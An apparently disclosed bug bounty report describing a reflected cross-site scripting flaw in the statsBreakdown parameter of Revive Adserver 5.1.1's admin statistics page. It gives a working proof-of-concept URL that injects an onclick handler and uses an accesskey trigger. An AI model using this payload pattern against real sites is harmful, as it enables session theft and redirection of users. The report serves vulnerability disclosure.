Reflected XSS on /admin/stats.php
Medium
R
Revive Adserver
Submitted None
Actions:
Reported by
solov9ev
Vulnerability Details
Technical details and impact analysis
Linked to the report [https://hackerone.com/reports/1083376](https://hackerone.com/reports/1083376)
I found a reflected XSS attack on `/admin/stats.php`.
Revive-Adserver version is `revive-adserver-5.1.1`.
### This time I found the parameter `statsBreakdown`
- Go to `http://revive-adserver.loc/admin/stats.php?statsBreakdown=day%27%20onclick=alert(document.domain)%20accesskey=X%20&listorder=key&orderdirection=up&day=&setPerPage=15&entity=global&breakdown=history&period_preset=last_month&period_start=01+December+2020&period_end=31+December+2020`
- For the payload to be executed, the user needs to press the access key combination for the hidden input field (for Firefox, Alt+Shift+X, see [this](https://developer.mozilla.org/en-US/docs/Web/HTML/Global_attributes/accesskey) for other browsers).
{F1186275}
## Impact
With this vulnerability, an attacker can for example steal users cookies or redirect users on malicious website.
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Cross-site Scripting (XSS) - Reflected